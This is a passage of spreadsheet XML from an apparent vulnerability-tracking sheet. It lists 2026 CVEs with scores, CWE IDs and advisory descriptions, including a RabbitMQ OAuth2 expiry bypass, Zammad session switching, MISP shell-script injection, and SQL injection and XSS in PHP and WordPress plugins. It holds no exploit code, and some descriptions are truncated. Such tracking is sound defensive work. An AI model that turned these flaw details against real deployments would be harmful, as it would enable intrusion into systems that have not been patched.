          <t>CVE-2026-67242</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, OAuth2 isinteger(Exp) guard skips token-expiry checks for float exp. validatetokenexpiry/1 (lines 208-214) and expirytimestamp/1 (138-144) both guard with 'when isinteger(Exp)' and fall through to ok/never for float values. josejwt:verify validates only the signature, not exp. With float exp, no expiry validation occurs anywhere in the If the IdP emits exp as a JSON float (RFC 7519 permits fractional NumericDate), both the login-time expiry check and the mid-connection disconnect timer are silently skipped , an already-expired token is accepted, and connections never time OAuth2 backend enabled IdP emits float exp (uncommon; mainstream IdPs emit integers) Attacker possesses a previously-valid signed. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67242</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84463</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-79, CWE-838</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a user with Knowledge Base editing rights for a category can embed a video widget in a published answer with a specially crafted value. When the answer is rendered, that value is inserted into the page's HTML without being escaped for its attribute context, allowing it to break out and inject additional HTML into the page. When another user who has permission to switch between user sessions views the affected answer, the injected HTML causes their browser to silently send a request to Zammad's session-switching endpoint using their own active credentials. This results in switching their session to an account chosen by the person who wrote the Knowledge Base answer. No action is required from the viewer beyond opening the published answer. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84463</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97863</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>cisco, gin</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>The cisco_firesight_manager_ACL_rule_export module in misp-modules generates a shell script (.sh) that authenticates to and calls the Cisco fireSIGHT Manager API. The module interpolates configuration values (IP address, login, password, domain ID, policy ID) and MISP attribute values (destination IPs, URLs, event info comments) directly into single-quoted shell string assignments without any escaping or sanitization. Because the values are placed inside single-quoted shell strings, any value containing a single-quote character (e.g., a crafted ip-dst or url attribute value submitted to MISP) breaks out of the quoting context, allowing an attacker to inject arbitrary shell commands into the exported script. A security analyst who subsequently executes the generated .sh file unmodified would run the injected commands with their own privileges, potentially exposing fireSIGHT Manager credentials, modifying ACL rules, or compromising the analyst workstation. Additionally, the module contained a secondary defect where the variable 'config' was only assigned inside a conditional block but referenced unconditionally afterward, causing a NameError (denial of service) when the request payload lacked a 'config' key. The vulnerability requires the attacker to have the ability to submit MISP events or attributes containing a single-quote character and the victim to execute the exported script. No authentication bypass is required beyond standard MISP event-submission privileges.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97863</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97886</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file managevideos2.php. Such manipulation of the argument editassid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97886</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97895</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in krayin laravel-crm up to 2.2.5. This affects an unknown part of the file packages/Webkul/Admin/src/Http/Controllers/Settings/UserController.php of the component User Management. Executing a manipulation of the argument role_id can lead to improper privilege management. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.6 is able to mitigate this issue. This patch is called 5469d70336fbb25e8e513683e82b32982ce8aa82. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97895</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100521</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in the search plugin highlight parameter that performs no HTML or JavaScript escaping. Attackers can craft malicious links with injected JavaScript in the highlight parameter that executes in the browser of any visitor who opens the link, including administrators.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100521</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100522</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in message.php where the lng parameter is not properly escaped before output in the confirmation dialog. Unauthenticated attackers can craft malicious links with script payloads in the lng parameter to execute arbitrary JavaScript in victim browser sessions.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100522</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100523</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains an open redirect vulnerability in message.php that base64-decodes the redirect parameter without domain validation. Unauthenticated attackers can craft malicious links with encoded external URLs to redirect users to arbitrary sites via meta refresh tags for phishing attacks.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100523</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17577</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'uri' (and 'host') parameters in versions up to, and including, 4.7.42. The ssl_zen_messages::getMessages() function builds the 'token_missmatch' message using base64_decode(sanitize_text_field($_REQUEST['uri'])) and (optionally) base64_decode(sanitize_text_field($_REQUEST['host'])). sanitize_text_field() cannot strip HTML/JavaScript that is hidden inside a base64-encoded blob, and the resulting decoded raw HTML is echoed unescaped by showMessage() . This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17577</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18312</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android constructs URLs in its WebView using attacker-controlled metadata without proper encoding or escaping. The application interpolates untrusted values directly into URL strings and inserts them into the DOM via innerHTML. Because the interpolation occurs without HTML or JavaScript context encoding, a crafted metadata value can break out of the intended URL structure and inject script content. An attacker could supply a document containing malicious metadata that, once synchronized to an Android device and rendered in the Reader WebView, results in execution of injected script content, enabling stored cross-site scripting (XSS)</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18312</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78393</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not properly escape some parameters before outputting them in the addresses of links it generates on its front-end directory pages, leading to Reflected Cross-Site Scripting which could be used against any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78393</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88996</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>The WPForms – AI Form Builder for WordPress – Contact Forms, Payment Forms, Survey Form, Quiz &amp; More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'page_title' POST Parameter via {page_title} Smart Tag in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable on forms whose admin-authored confirmation message places the {page_title} Smart Tag inside an HTML attribute context.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88996</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92212</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'jfb_xss' (URL Query Variable) Parameter via Calculated Field in all versions up to, and including, 3.6.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploitation requires the targeted page to host a form configured with both a URL Query Variable preset field and a Calculated Field that references it, which are standard plugin features.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92212</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54790</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores an administrator-controlled custom_field_table value without validating it against the allowed custom-field table names. Mdl_custom_fields::used() later concatenates that stored value into the FROM table and WHERE column identifier positions, so opening the custom-field edit form executes a second-order SQL injection. The injection can query arbitrary schema data and can cause application errors or denial of service. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54790</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66071</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
